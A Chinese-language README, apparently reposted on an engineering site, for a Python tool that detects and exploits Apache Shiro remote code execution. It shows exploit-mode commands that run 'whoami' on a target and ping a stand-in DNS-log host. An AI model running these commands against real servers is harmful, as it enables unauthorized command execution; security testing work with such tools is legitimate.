0x01 工具介紹
一個簡單的Shiro RCE檢測和利用腳本。
0x02 安裝與使用
1、安裝需要的包
pip install -r requirements.txt
2、檢查該漏洞
python ShiroRceTool.py -m scan -u "http://example.com"
3、執(zhí)行命令 (不回顯)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"
4、執(zhí)行命令(嘗試回顯)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e
5、獲取幫助 - Get help
python ShiroRceTool.py ____ _ _ ____ _____ _ / ___|| |__ (_)_ __ ___ | _ ___ __|_ _|__ ___ | | \___ | '_ | | '__/ _ | |_) / __/ _ | |/ _ / _ | | ___) | | | | | | | (_) | _ < (_| __/| | (_) | (_) | | |____/|_| |_|_|_| \___/|_| _\___\___||_|\___/ \___/|_| By: Hack3rHan usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e] options: -h, --help show this help message and exit -m MODE, --mode MODE "exploit" or "scan". -u URL, --url URL URL of the target. -c CMD, --cmd CMD Command to execute. -e, --echo Echo mode.
審核編輯:湯梓紅
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。
舉報投訴
-
檢測
+關注
關注
5文章
4436瀏覽量
91368 -
命令
+關注
關注
5文章
678瀏覽量
21984 -
腳本
+關注
關注
1文章
387瀏覽量
14831
原文標題:一個簡單的Shiro RCE檢測和利用腳本。
文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。
發(fā)布評論請先 登錄
相關推薦
Lua腳本簡單介紹
Lua簡單介紹Lua[1]是一個小巧的腳本語言。作者是巴西人。該語言的設計目的是為了嵌入應用程序中,從而為應用程序提供靈活的擴展和定制功能。Lua腳
發(fā)表于 08-20 06:37
Lua腳本簡單介紹
Lua簡單介紹Lua[1]是一個小巧的腳本語言。作者是巴西人。該語言的設計目的是為了嵌入應用程序中,從而為應用程序提供靈活的擴展和定制功能。Lua腳
發(fā)表于 08-20 08:06
基于DirectShow技術的RCE算法視頻加密方案
本文設計了一種利用DirectShow 技術結合一種新的RCE 算法實現(xiàn)視頻數(shù)據(jù)加密的方案。首先介紹了RCE 算法的加密解密過程和原理,然后
發(fā)表于 06-26 08:52
?35次下載
Apache Shiro框架的詳細資料說明
對新的用戶機制并不熟悉,導致出現(xiàn)問題時耗費了大量的時間來進行修復。因此,我認為我有必要編寫此文來介紹一下新的 Shiro 用戶機制。
發(fā)表于 03-08 08:00
?4次下載
如何創(chuàng)建和執(zhí)行一個簡單的Linux shell腳本
如果您愿意要嘗試更長的shell腳本,請將下面的shell腳本(并附加為PDF和ODT文件)復制到文本編輯器中,保存,使其可執(zhí)行并運行。當您了解更多Linux命令時,您可以創(chuàng)建更復雜的shell腳本。
如何巧妙利用HFSS腳本錄制功能
。 摘要: 在學個Antenna:HFSS腳本建模入門中,介紹了利用HFSS自帶的Record Script To File功能進行腳本錄制。但是大部分情況下,工程師們只是希望錄制
109個實用shell腳本分享
Shell腳本,就是利用Shell的命令解釋的功能,對一個純文本的文件進行解析,然后執(zhí)行這些功能,也可以說Shell腳本就是
如何創(chuàng)建一個簡單的腳本
Shell 腳本可以為您節(jié)省時間和精力,但是如果您不保護您的密碼,它們就會成為您的負擔。以下是如何保持安全的方法。
shiro綜合利用工具介紹
shiro綜合利用工具:ShiroExp ? 工具介紹 shiro一把梭工具,該輪子主要有三大功能如下: 1、默認密鑰爆破 利用Simple
利用Python寫了一個監(jiān)控服務器資源利用率的腳本!
研究了一個腳本,其主要目的是:基于 Python 編程語言來監(jiān)控服務器的 CPU、內存、/目錄、/appslog、/bigdata目錄使用率以及網(wǎng)卡接收和發(fā)送情況。
Shiro功能介紹
記得做的第一個Web項目,系統(tǒng)認證授權這塊就是基于Shiro實現(xiàn)的,當時也是第一次接觸到這種類型的框架,同時是基于Spring做的集成,并且相關的配置都已經(jīng)是定制好的,只需要我們根據(jù)項目情況對極少
評論